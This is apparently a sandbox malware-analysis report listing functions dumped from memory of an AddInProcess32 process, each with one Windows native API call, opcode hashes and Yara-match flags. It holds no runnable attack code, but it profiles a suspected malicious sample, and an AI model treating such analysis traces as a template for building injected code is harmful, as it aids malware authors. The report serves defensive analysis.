API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 5e8cd41d51284982e25911d274f28a78580cdf29c6fc312a66be96a2157c5599
Instruction ID: ae3959ebcc6098a7327b7b955a211adc42423b673bee7538e60c43ba4ab794ec
Opcode Fuzzy Hash: 5e8cd41d51284982e25911d274f28a78580cdf29c6fc312a66be96a2157c5599
Instruction Fuzzy Hash: FB1133B1C045585AEF34CAB1DD45ADFBB75FB40314F60026EE912A7191D33919858F45

Uniqueness

Uniqueness Score: -1.00%

Function 0041DEB1 Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000005,00000000,004187D3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187D3,00000000,00000005,00000060,00000000,00000000), ref: 0041DF04

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8013c7e00cafae3ac891428cd5e51b4fdd09e1764b87e215520eea2068618ea3
Instruction ID: 3f9de0e0db9163c45f0e07cc0dafe756bcf091ef31349fdead65835711c1c722
Opcode Fuzzy Hash: 8013c7e00cafae3ac891428cd5e51b4fdd09e1764b87e215520eea2068618ea3
Instruction Fuzzy Hash: F101BDB2201108AFCB58CF99EC95EEB37A9AF8C754F118258FA1DD7241D630F851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041DEB7 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000005,00000000,004187D3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187D3,00000000,00000005,00000060,00000000,00000000), ref: 0041DF04

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
Instruction ID: c0286b2864f0c35431545fb634747f2496e329dba7df57a784a8bffd1e9d319f
Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
Instruction Fuzzy Hash: B7F0CFB2204208AFCB08CF89DC85EEB37EDAF8C754F018208BA0D97241C630F851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF67 Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(00418997,00413C6F,FFFFFFFF,00418481,00000206,?,00418997,00000206,00418481,FFFFFFFF,00413C6F,00418997,00000206,00000000), ref: 0041DFAC

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
Instruction ID: 32b046dcbb71cb4e6359c6725ba47d80c1c5cab5c032eea9b29b0e9906148c6b
Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
Instruction Fuzzy Hash: BCF0AFB6200208ABCB14DF89DC85EEB77ADAF8C754F118249BE0DA7241D630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041DFE2 Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00418975,00000206,?,00418975,00000005,FFFFFFFF), ref: 0041E00C

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 8be85a51aaa1456298486231eed1cef669b64ade4e325e3a5c274837d85112d3
Instruction ID: 9333738f6315197c52897b9acbfa4fc777e2fca57136ed0eea7d885d64d4b451
Opcode Fuzzy Hash: 8be85a51aaa1456298486231eed1cef669b64ade4e325e3a5c274837d85112d3
Instruction Fuzzy Hash: ACE086316042146BD724EFA49C49ECB3B58DF45260F014259BD5D5B282C670E500C794

Uniqueness

Uniqueness Score: -1.00%

Function 0041DFE7 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00418975,00000206,?,00418975,00000005,FFFFFFFF), ref: 0041E00C

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
Instruction ID: 51f7b19349b25f870e13c14fb46d1f84fc665ab1cf3978e02f270bc9d52711b0
Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
Instruction Fuzzy Hash: 97D01776204214ABD614EFA9DC89ED77BACDF48664F014155BA0D5B242C630FA00CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 018999A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018999AA

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b84c4ee8964a40039a5e96a9ff9037e251541c346b2514dc50fe3f8596a9ad6
Instruction ID: be05b566e99184db9e5cc75eaac03969a03815253e147b1eef2664b7c9bc766f
Opcode Fuzzy Hash: 2b84c4ee8964a40039a5e96a9ff9037e251541c346b2514dc50fe3f8596a9ad6
Instruction Fuzzy Hash: 759002A134100453E10061994414B060005E7E1341FD1C115E205C6A4DDA59CD567166

Uniqueness

Uniqueness Score: -1.00%

Function 01899910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0189991A

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e49be217eb187092d30ff9e0db5f6088a6a612a0fe795f92de6fd93908ef800
Instruction ID: c9ea6a8c9b6eacfe9dae68d01df55f4e0469bbb7a0e9e9ba68660b3a6ac8b6c6
Opcode Fuzzy Hash: 4e49be217eb187092d30ff9e0db5f6088a6a612a0fe795f92de6fd93908ef800
Instruction Fuzzy Hash: 7B9002B120100413E140719944047460005A7D0341FD1C111A605C6A4EDA998ED976A5

Uniqueness

Uniqueness Score: -1.00%

Function 018998F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018998FA

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b2cb950dc2cabb2af94e993bd6d6d546c7556408b440537041530d36710512bb
Instruction ID: 12fab08f6d8ed5df531e67fcb050d7fde179281e0745c8ee43f4153862c768fd
Opcode Fuzzy Hash: b2cb950dc2cabb2af94e993bd6d6d546c7556408b440537041530d36710512bb
Instruction Fuzzy Hash: 1C90026160100513E10171994404616000AA7D0381FD1C122A201C6A5EDE658A96B171

Uniqueness

Uniqueness Score: -1.00%

Function 01899840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0189984A

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f6c4f5093ff0aa1d903b6bd888274923ce5f011255956a7c29ee7d1f31b8d649
Instruction ID: d90acacee73c877dc9d11f3de4f35a477d02063b495da81bed01820b5f3cc4dc
Opcode Fuzzy Hash: f6c4f5093ff0aa1d903b6bd888274923ce5f011255956a7c29ee7d1f31b8d649
Instruction Fuzzy Hash: 7B900261242041636545B19944045074006B7E03817D1C112A240CAA0CD966995AE661

Uniqueness

Uniqueness Score: -1.00%

Function 01899860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0189986A

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 264adf39f5470f717b9676f09e9b06cff3631dec628936180811628170637f34
Instruction ID: 86ea48be0d74b58b53c69c9cc7416c7cdbca845e356f0b814177761fca2eefe8
Opcode Fuzzy Hash: 264adf39f5470f717b9676f09e9b06cff3631dec628936180811628170637f34
Instruction Fuzzy Hash: E090027120100423E111619945047070009A7D0381FD1C512A141C6A8DEA968A56B161

Uniqueness

Uniqueness Score: -1.00%

Function 01899A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01899A0A

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d07f131b82ea9f45a0c39c94d1bca8eda5ebef5a81d2d8303f02411c8fbaf56d
Instruction ID: 78e036e07e1e774548c4ff8e16f0624373e7f369808d002cc04de7be48517af4
Opcode Fuzzy Hash: d07f131b82ea9f45a0c39c94d1bca8eda5ebef5a81d2d8303f02411c8fbaf56d
Instruction Fuzzy Hash: 4390027120140413E1006199481470B0005A7D0342FD1C111A215C6A5DDA65895575B1

Uniqueness

Uniqueness Score: -1.00%

Function 01899A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01899A2A

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 93c20231b510a618a2650d9f4213884db8afbd85c4adb9739123f0c0dd9a10a1
Instruction ID: 6977aa2449558a538ea08f2d7e2beb31755c06b172cf664fdb8862bcb5c7d3b0
Opcode Fuzzy Hash: 93c20231b510a618a2650d9f4213884db8afbd85c4adb9739123f0c0dd9a10a1
Instruction Fuzzy Hash: D490026160100053514071A988449064005BBE13517D1C221A198C6A0DD999896966A5

Uniqueness

Uniqueness Score: -1.00%

Function 01899A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01899A5A

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cd2375cfd926fa9cda2027b3ace307372470cf63f1a7168a02c9b90f8096c980
Instruction ID: 5845a932fbf779bcdfba24c53dc793b1aa9826263dce05b2ed6df5bbdc2aa687
Opcode Fuzzy Hash: cd2375cfd926fa9cda2027b3ace307372470cf63f1a7168a02c9b90f8096c980
Instruction Fuzzy Hash: CD90026121180053E20065A94C14B070005A7D0343FD1C215A114C6A4CDD5589656561

Uniqueness

Uniqueness Score: -1.00%

Function 018995D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018995DA

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ba5bc391043e3e54c92071f7ca2196533d862b181a4acf29293633ca56e6f96b
Instruction ID: fcfdea3165a156a8e6cd7b8d66353d4eed1dd3304e33a8da847088f76afe94de
Opcode Fuzzy Hash: ba5bc391043e3e54c92071f7ca2196533d862b181a4acf29293633ca56e6f96b
Instruction Fuzzy Hash: 489002A120200013510571994414616400AA7E0341BD1C121E200C6E0DD96589957165

Uniqueness

Uniqueness Score: -1.00%

Function 01899540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0189954A

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d1a1b50c49ecddf97e1619f4cee1b982ae0cf7b2a312f713e12fdb1f58b5a990
Instruction ID: 9c31f10b65c1b17adb4a1da569c9629f2a0035efe06d8fb9fce7b1755c49346b
Opcode Fuzzy Hash: d1a1b50c49ecddf97e1619f4cee1b982ae0cf7b2a312f713e12fdb1f58b5a990
Instruction Fuzzy Hash: 40900265211000131105A59907045070046A7D53913D1C121F200D6A0CEA6189656161

Uniqueness

Uniqueness Score: -1.00%

Function 01899780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0189978A

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d9d1910617452eff9faad44160f9a57036a3c5adf6b0c022779319105d83d4c3
Instruction ID: aebaa85dc7325572423a7c7d2361c7689c7172b44921a182c8d7d699a83708dd
Opcode Fuzzy Hash: d9d1910617452eff9faad44160f9a57036a3c5adf6b0c022779319105d83d4c3
Instruction Fuzzy Hash: 3890026921300013E1807199540860A0005A7D1342FD1D515A100D6A8CDD55896D6361

Uniqueness

Uniqueness Score: -1.00%

Function 018997A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018997AA

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b2e096607b8b0f60527155841998bb9294c7501dcca51442bde13606a3f07fb3
Instruction ID: 7af57fda57005fc0f73c2f41d434a583a1da19019728ad00764b0f33d4828bcd
Opcode Fuzzy Hash: b2e096607b8b0f60527155841998bb9294c7501dcca51442bde13606a3f07fb3
Instruction Fuzzy Hash: 9490026130100013E140719954186064005F7E1341FD1D111E140C6A4CED55895A6262

Uniqueness

Uniqueness Score: -1.00%

Function 01899FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01899FEA

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 30b2d85bee73aafa2b5a8769d5f5e6d73c9790811473cea2e2beeabfa3cb2725
Instruction ID: dc13446342c5b1287df32e13214e6b45c9091440c8f421d8b6aef7f56c0244b7
Opcode Fuzzy Hash: 30b2d85bee73aafa2b5a8769d5f5e6d73c9790811473cea2e2beeabfa3cb2725
Instruction Fuzzy Hash: 2D90027131114413E110619984047060005A7D1341FD1C511A181C6A8DDAD589957162

Uniqueness

Uniqueness Score: -1.00%

Function 01899710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0189971A

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d3931e706344692c3f7b4b672f8a54aa9f491c78bca8965cbc90a62fef63e9fc
Instruction ID: 94dabb16db271464e0e144188247c30307e0b50452731a2d6511d64da89cf7d1
Opcode Fuzzy Hash: d3931e706344692c3f7b4b672f8a54aa9f491c78bca8965cbc90a62fef63e9fc
Instruction Fuzzy Hash: 6890027120100413E10065D954086460005A7E0341FD1D111A601C6A5EDAA589957171

Uniqueness

Uniqueness Score: -1.00%

Function 018996E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018996EA

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 26113174f8c9a815c51c77c87b675918b2a2f9e4c4959008bb65b4f44b1cf15b
Instruction ID: aa75988fb10b2f83a16cdcd26b8377903bb18ba38f4d476463e6dc4ee5776d9c
Opcode Fuzzy Hash: 26113174f8c9a815c51c77c87b675918b2a2f9e4c4959008bb65b4f44b1cf15b
Instruction Fuzzy Hash: 1590027120108813E1106199840474A0005A7D0341FD5C511A541C7A8DDAD589957161

Uniqueness

Uniqueness Score: -1.00%

Function 01899660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0189966A

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9927232ef105fc65941052313e5f6b6e4b881b480e6444648a0acddd533027fd
Instruction ID: 1ade2ed787246c4ce4d1eebb849fb3957c35307ee5e4687a239da998e6187e35
Opcode Fuzzy Hash: 9927232ef105fc65941052313e5f6b6e4b881b480e6444648a0acddd533027fd
Instruction Fuzzy Hash: 9190027120100813E1807199440464A0005A7D1341FD1C115A101D7A4DDE558B5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 00408D77 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408DD1

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 95c0cf5819db1854bc5c0dc0079e54f48cb26ca33ae3f1a29f068a4d56065828
Instruction ID: 97f6e7e971e73197f155d365dba0286c580c115ece0ca8fbe3fead2fc42a28db
Opcode Fuzzy Hash: 95c0cf5819db1854bc5c0dc0079e54f48cb26ca33ae3f1a29f068a4d56065828
Instruction Fuzzy Hash: DB018831A8022877E720A6959C43FFE766C9F01B55F14412EFF04BA1C1EAA8690586E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C307 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040C379

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 89e2dd786e92ee88a1331b963abd4538c92f1c0a14e6e32c28af7146fae9f6b9
Instruction ID: aa26c3208db21fe9d8923b5e80f95f0723e0f9138b5b7b95b39cff3b6d63b904
Opcode Fuzzy Hash: 89e2dd786e92ee88a1331b963abd4538c92f1c0a14e6e32c28af7146fae9f6b9
Instruction Fuzzy Hash: 230112B5E4010DEBDB10DBE5DC82F9EB7B89F54304F0082A5AD08A7281F635EB588795

Uniqueness

Uniqueness Score: -1.00%

Function 0041E319 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F379,0040F379,?,00000000,?,?), ref: 0041E357

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 41ad720353dcb2742b5d85865cd54be19fdf99255da96ff7e466d990369bbe56
Instruction ID: f0d36b154beff089945ff36c40b7f6c6b12bf8043563d0b61c72c28c0769dced
Opcode Fuzzy Hash: 41ad720353dcb2742b5d85865cd54be19fdf99255da96ff7e466d990369bbe56
Instruction Fuzzy Hash: 66F0A071200210AFDB20DF15CC45EE77768EF85310F01856AFD089B241C631A801CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041E1C3 Relevance: 1.5, APIs: 1, Instructions: 25
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1F4

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d29290ae4f9fce0d10f3c5a44607d4ffcfd3958d931ef90672fa9196cc4fc4e1
Instruction ID: 224e322902f371e62c276b0b9204af5c1033e43e491b3695333fa65565b85d12
Opcode Fuzzy Hash: d29290ae4f9fce0d10f3c5a44607d4ffcfd3958d931ef90672fa9196cc4fc4e1
Instruction Fuzzy Hash: EDE09AB12002006BD714DF49DC48ED737A9AF88354F108259F90C97282C630F804CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041E1C7 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1F4

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
Instruction ID: ff71e45145ce3c742298049d26a32dfca4dc9eab044cbc71735d9f34edea979b
Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
Instruction Fuzzy Hash: 95E046B5200218ABDB14EF8ADC49EE737ACEF88754F018159FE095B242CA30F914CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E187 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(0041812D,?,004188D4,004188D4,?,0041812D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E1B4

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
